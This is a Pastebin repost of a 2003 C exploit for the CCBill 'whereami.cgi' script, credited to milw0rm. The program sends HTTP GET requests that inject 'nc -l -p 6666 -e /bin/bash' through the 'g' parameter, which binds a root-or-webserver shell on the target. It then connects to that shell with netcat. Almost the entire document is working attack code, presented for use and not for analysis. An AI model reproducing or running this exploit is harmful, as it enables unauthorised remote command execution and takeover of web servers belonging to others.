Advertisement
FlyFar

CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution

Feb 2nd, 2024
859
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.74 KB | Cybersecurity | 0 0
  1. /*
  2. * =====================================
  3. * CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
  4. * By: Knight420
  5. * 7/07/03
  6. *
  7. * spawns a shell with netcat and attempts to connect
  8. * into the server on port 6666 to gain access of the
  9. * webserver uid
  10. *
  11. * (C) COPYRIGHT Blue Ballz , 2003
  12. * all rights reserved
  13. * =====================================
  14. *
  15. */
  16.  
  17. #include <sys/types.h>
  18. #include <sys/time.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23. #include <errno.h>
  24. #include <stdlib.h>
  25. #include <stdio.h>
  26. #include <string.h>
  27. #include <fcntl.h>
  28. #include <netdb.h>
  29.  
  30.  
  31. unsigned long int   net_resolve (char *host);
  32. int         net_connect (struct sockaddr_in *cs, char *server,
  33.             unsigned short int port, int sec);
  34.  
  35. unsigned char ccbill[] =
  36. "GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  37. "GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
  38. "GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";
  39.  
  40. int
  41. main (int argc, char **argv)
  42. {
  43.     int         socket;
  44.     char  *TARGET     =     "TARGET";
  45.     char            *server;
  46.     unsigned short int  port;
  47.     struct sockaddr_in  sa;
  48.  
  49.     if (argc != 3) {
  50.         system("clear");
  51.         printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
  52.         "usage: %s <host> <port>\n");
  53.         exit (EXIT_FAILURE);
  54.     }
  55.     setenv (TARGET, argv[1], 1);
  56.     server = argv[1];
  57.     port = atoi (argv[2]);
  58.  
  59.     socket = net_connect (&sa, server, port, 35);
  60.     if (socket <= 0) {
  61.         perror ("net_connect");
  62.         exit (EXIT_FAILURE);
  63.     }
  64.  
  65.     write (socket, ccbill, strlen (ccbill));
  66.     sleep (1);
  67.     close (socket);
  68.  
  69.     printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
  70.     printf ("[1] evil data sent.\n", server);
  71.     printf ("[2] connecting to shell.\n", server);
  72.     system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
  73.     exit (EXIT_SUCCESS);
  74. }
  75.  
  76. unsigned long int
  77. net_resolve (char *host)
  78. {
  79.     long        i;
  80.     struct hostent  *he;
  81.  
  82.     i = inet_addr (host);
  83.     if (i == -1) {
  84.         he = gethostbyname (host);
  85.         if (he == NULL) {
  86.             return (0);
  87.         } else {
  88.             return (*(unsigned long *) he->h_addr);
  89.         }
  90.     }
  91.  
  92.     return (i);
  93. }
  94.  
  95.  
  96. int
  97. net_connect (struct sockaddr_in *cs, char *server,
  98.     unsigned short int port, int sec)
  99. {
  100.     int     n, len, error, flags;
  101.     int     fd;
  102.     struct timeval  tv;
  103.     fd_set      rset, wset;
  104.  
  105.     /* first allocate a socket */
  106.     cs->sin_family = AF_INET;
  107.     cs->sin_port = htons (port);
  108.     fd = socket (cs->sin_family, SOCK_STREAM, 0);
  109.     if (fd == -1)
  110.         return (-1);
  111.  
  112.     cs->sin_addr.s_addr = net_resolve (server);
  113.     if (cs->sin_addr.s_addr == 0) {
  114.         close (fd);
  115.         return (-1);
  116.     }
  117.  
  118.     flags = fcntl (fd, F_GETFL, 0);
  119.     if (flags == -1) {
  120.         close (fd);
  121.         return (-1);
  122.     }
  123.     n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
  124.     if (n == -1) {
  125.         close (fd);
  126.         return (-1);
  127.     }
  128.  
  129.     error = 0;
  130.  
  131.     n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
  132.     if (n < 0) {
  133.         if (errno != EINPROGRESS) {
  134.             close (fd);
  135.             return (-1);
  136.         }
  137.     }
  138.     if (n == 0)
  139.         goto done;
  140.  
  141.     FD_ZERO(&rset);
  142.     FD_ZERO(&wset);
  143.     FD_SET(fd, &rset);
  144.     FD_SET(fd, &wset);
  145.     tv.tv_sec = sec;
  146.     tv.tv_usec = 0;
  147.  
  148.     n = select(fd + 1, &rset, &wset, NULL, &tv);
  149.     if (n == 0) {
  150.         close(fd);
  151.         errno = ETIMEDOUT;
  152.         return (-1);
  153.     }
  154.     if (n == -1)
  155.         return (-1);
  156.  
  157.     if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
  158.         if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
  159.             len = sizeof(error);
  160.             if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
  161.                 errno = ETIMEDOUT;
  162.                 return (-1);
  163.             }
  164.             if (error == 0) {
  165.                 goto done;
  166.             } else {
  167.                 errno = error;
  168.                 return (-1);
  169.             }
  170.         }
  171.     } else
  172.         return (-1);
  173. done:
  174.     n = fcntl(fd, F_SETFL, flags);
  175.     if (n == -1)
  176.         return (-1);
  177.  
  178.     return (fd);
  179. }
  180.  
  181. // milw0rm.com [2003-07-10]
  182.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement